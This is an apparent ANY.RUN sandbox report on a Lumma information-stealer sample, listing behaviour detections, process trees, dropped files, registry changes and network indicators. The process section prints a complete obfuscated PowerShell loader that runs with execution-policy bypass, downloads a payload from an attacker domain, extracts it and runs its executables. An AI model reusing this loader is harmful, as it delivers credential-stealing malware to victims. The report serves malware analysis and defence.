File name:

out2.bin

Full analysis: https://app.any.run/tasks/c62cd75b-b6bb-460b-b4e0-9dd9d6bf26d4
Verdict: Malicious activity
Threats:

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Analysis date: November 24, 2024, 02:01:29
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
pastebin
stealer
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

1EA995648886E258AECAD46C6838CCA5

SHA1:

FC193A056AE09BAD6142084FBA7F92A16E3B51DF

SHA256:

00A7FD7BE4BC626A7A5DF9FFBBAAE205428F096011D527B89B183EEB64D34274

SSDEEP:

12288:Mx0vCG1/RRYxiu66NntLpU0qk9seTyYSMQ/PeeqkNegJO/g:4triPeeqfgJO/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • LUMMA has been detected (YARA)

      • out2.bin.exe (PID: 396)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3688)
      • powershell.exe (PID: 68)
      • powershell.exe (PID: 2496)
    • Steals credentials from Web Browsers

      • out2.bin.exe (PID: 396)
    • Actions looks like stealing of personal data

      • out2.bin.exe (PID: 396)
    • Changes powershell execution policy (Bypass)

      • out2.bin.exe (PID: 396)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 68)
    • Executing a file with an untrusted certificate

      • VCDDaemon.exe (PID: 6612)
    • Known privilege escalation attack

      • dllhost.exe (PID: 6820)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • out2.bin.exe (PID: 396)
    • Base64-obfuscated command line is found

      • out2.bin.exe (PID: 396)
    • The process executes Powershell scripts

      • out2.bin.exe (PID: 396)
    • BASE64 encoded PowerShell command has been detected

      • out2.bin.exe (PID: 396)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2496)
    • Writes data to a memory stream (POWERSHELL)

      • powershell.exe (PID: 68)
    • Starts itself from another location

      • VCDDaemon.exe (PID: 6612)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 68)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 68)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 68)
      • VCDDaemon.exe (PID: 6612)
    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 68)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 68)
    • Starts application with an unusual extension

      • VCDDaemon.exe (PID: 6868)
      • VCDDaemon.exe (PID: 6644)
    • Connects to unusual port

      • explorer.exe (PID: 6396)
  • INFO

    • Checks supported languages

      • out2.bin.exe (PID: 396)
      • VCDDaemon.exe (PID: 6612)
      • VCDDaemon.exe (PID: 6868)
      • more.com (PID: 6916)
      • VCDDaemon.exe (PID: 6644)
      • more.com (PID: 6676)
    • Reads the software policy settings

      • out2.bin.exe (PID: 396)
      • explorer.exe (PID: 6396)
    • Reads the computer name

      • out2.bin.exe (PID: 396)
      • VCDDaemon.exe (PID: 6612)
      • more.com (PID: 6676)
      • more.com (PID: 6916)
      • VCDDaemon.exe (PID: 6868)
      • VCDDaemon.exe (PID: 6644)
    • Create files in a temporary directory

      • out2.bin.exe (PID: 396)
      • VCDDaemon.exe (PID: 6868)
      • more.com (PID: 6916)
      • VCDDaemon.exe (PID: 6644)
    • The process uses the downloaded file

      • powershell.exe (PID: 3688)
      • dllhost.exe (PID: 6820)
      • powershell.exe (PID: 68)
    • Disables trace logs

      • powershell.exe (PID: 2496)
      • powershell.exe (PID: 68)
    • Checks proxy server information

      • powershell.exe (PID: 2496)
      • powershell.exe (PID: 68)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 3688)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 3688)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2496)
      • powershell.exe (PID: 3688)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 68)
    • Creates files or folders in the user directory

      • VCDDaemon.exe (PID: 6612)
    • The executable file from the user directory is run by the Powershell process

      • VCDDaemon.exe (PID: 6612)
    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 68)
    • Found Base64 encoded file access via PowerShell (YARA)

      • powershell.exe (PID: 68)
    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 6820)
    • Reads the machine GUID from the registry

      • more.com (PID: 6676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:11:21 13:33:33+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 268800
InitializedDataSize: 47616
UninitializedDataSize: -
EntryPoint: 0x8860
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
145
Monitored processes
16
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start #LUMMA out2.bin.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe conhost.exe no specs vcddaemon.exe vcddaemon.exe no specs more.com no specs conhost.exe no specs CMSTPLUA vcddaemon.exe no specs more.com no specs conhost.exe no specs explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
68powershell -exec bypass -Enc $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   =   { 
         S t a r t - S l e e p   - S e c o n d s   3 
 
         [ S y s t e m . N e t . W e b R e q u e s t ] : : C r e a t e ( " h t t p s : / / w w w . 3 6 0 . n e t " ) . G e t R e s p o n s e ( ) . C l o s e ( ) 
 
         S t a r t - S l e e p   - S e c o n d s   1 
 
         [ S y s t e m . N e t . W e b R e q u e s t ] : : C r e a t e ( " h t t p s : / / w w w . b a i d u . c o m " ) . G e t R e s p o n s e ( ) . C l o s e ( ) 
 
         S t a r t - S l e e p   - S e c o n d s   1 
 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   " h t t p s : / / m a s a . r 2 c l o u d z u g y b y i 8 . s h o p / i n t _ c l p _ s h a . t x t " 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . D o w n l o a d D a t a ( $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l ) 
 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . W r i t e ( $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l ,   0 ,   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . L e n g t h ) 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . S e e k ( 0 ,   [ S y s t e m . I O . S e e k O r i g i n ] : : B e g i n ) 
 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   [ S y s t e m . G u i d ] : : N e w G u i d ( ) . T o S t r i n g ( ) 
         $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   =   [ S y s t e m . I O . P a t h ] : : C o m b i n e ( $ e n v : L O C A L A P P D A T A ,   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l ) 
         N e w - I t e m   - P a t h   $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   - I t e m T y p e   D i r e c t o r y   - F o r c e   |   O u t - N u l l 
 
         $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   =   [ S y s t e m . I O . P a t h ] : : C o m b i n e ( $ e n v : T E M P ,   " $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . z i p " ) 
         [ S y s t e m . I O . F i l e ] : : W r i t e A l l B y t e s ( $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x ,   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . T o A r r a y ( ) ) 
 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   N e w - O b j e c t   - C o m O b j e c t   S h e l l . A p p l i c a t i o n 
         $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   =   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . N a m e S p a c e ( $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x ) 
         $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   =   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l . N a m e S p a c e ( $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x ) 
 
         $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x . C o p y H e r e ( $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x . I t e m s ( ) ,   2 0 ) 
 
         $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l   =   G e t - C h i l d I t e m   - P a t h   $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   - F i l t e r   * . e x e   - R e c u r s e 
         f o r e a c h   ( $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   i n   $ l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l l )   { 
                 S t a r t - P r o c e s s   - F i l e P a t h   $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x . F u l l N a m e   - N o N e w W i n d o w   - W a i t 
         } 
 
         # R e m o v e - I t e m   - P a t h   $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   - R e c u r s e   - F o r c e 
 } 
 
 &   $ x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x   >   $ n u l l   2 > & 1 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
out2.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
396"C:\Users\admin\Desktop\out2.bin.exe" C:\Users\admin\Desktop\out2.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\out2.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll
624\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2496powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\O38RGR9UFHGYN8H1E0NL5GR.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
out2.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3688powershell -exec bypass -f "C:\Users\admin\AppData\Local\Temp\SOKH9XT84IRD0T6ED7.ps1"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeout2.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
4976\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5728\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6396C:\WINDOWS\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe
more.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Explorer
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\users\admin\appdata\local\temp\leusegmdadv
c:\windows\syswow64\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
6612"C:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\VCDDaemon.exe"C:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\VCDDaemon.exe
powershell.exe
User:
admin
Company:
Elaborate Bytes AG
Integrity Level:
MEDIUM
Description:
Virtual CloneDrive Daemon
Exit code:
0
Version:
5, 4, 5, 1
Modules
Images
c:\users\admin\appdata\local\8152f0cd-cfda-4115-82ba-debada73f267\vcddaemon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
6644C:\Users\admin\AppData\Roaming\TnMake\VCDDaemon.exeC:\Users\admin\AppData\Roaming\TnMake\VCDDaemon.exeVCDDaemon.exe
User:
admin
Company:
Elaborate Bytes AG
Integrity Level:
MEDIUM
Description:
Virtual CloneDrive Daemon
Exit code:
1
Version:
5, 4, 5, 1
Modules
Images
c:\users\admin\appdata\roaming\tnmake\vcddaemon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events
23 614
Read events
23 597
Write events
17
Delete events
0

Modification events

(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2496) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
79
Suspicious files
7
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
68powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_i2fl3bdv.k5d.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2496powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ko2m3ylp.m5s.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wlcaxd2x.kbq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
68powershell.exeC:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\api-ms-win-core-synch-l1-1-0.dllexecutable
MD5:6C3FCD71A6A1A39EAB3E5C2FD72172CD
SHA256:A31A15BED26232A178BA7ECB8C8AA9487C3287BB7909952FC06ED0D2C795DB26
3688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gdjlmrfx.jvg.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
68powershell.exeC:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\api-ms-win-crt-conio-l1-1-0.dllexecutable
MD5:031DC390780AC08F498E82A5604EF1EB
SHA256:B119ADAD588EBCA7F9C88628010D47D68BF6E7DC6050B7E4B787559F131F5EDE
68powershell.exeC:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\api-ms-win-core-synch-l1-2-0.dllexecutable
MD5:D175430EFF058838CEE2E334951F6C9C
SHA256:1C72AC404781A9986D8EDEB0EE5DD39D2C27CE505683CA3324C0ECCD6193610A
68powershell.exeC:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\api-ms-win-core-timezone-l1-1-0.dllexecutable
MD5:43E1AE2E432EB99AA4427BB68F8826BB
SHA256:3D798B9C345A507E142E8DACD7FB6C17528CC1453ABFEF2FFA9710D2FA9E032C
68powershell.exeC:\Users\admin\AppData\Local\8152f0cd-cfda-4115-82ba-debada73f267\api-ms-win-core-string-l1-1-0.dllexecutable
MD5:7A15B909B6B11A3BE6458604B2FF6F5E
SHA256:9447218CC4AB1A2C012629AAAE8D1C8A428A99184B011BCC766792AF5891E234
3688powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zzu1z4fk.d42.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
66
DNS requests
26
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4328
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4328
svchost.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6500
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6500
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4328
svchost.exe
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4328
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.209.187:443
www.bing.com
Akamai International B.V.
GB
whitelisted
1176
svchost.exe
40.126.31.69:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.9
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
google.com
  • 142.250.74.206
whitelisted
www.bing.com
  • 2.23.209.187
  • 2.23.209.133
  • 2.23.209.130
whitelisted
login.live.com
  • 40.126.31.69
  • 40.126.31.67
  • 40.126.31.73
  • 20.190.159.23
  • 40.126.31.71
  • 20.190.159.64
  • 20.190.159.73
  • 20.190.159.2
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
sunny-beach.shop
  • 172.67.166.207
  • 104.21.49.200
malicious
pastebin.com
  • 172.67.19.24
  • 104.20.3.235
  • 104.20.4.235
shared

Threats

PID
Process
Class
Message
2192
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
No debug info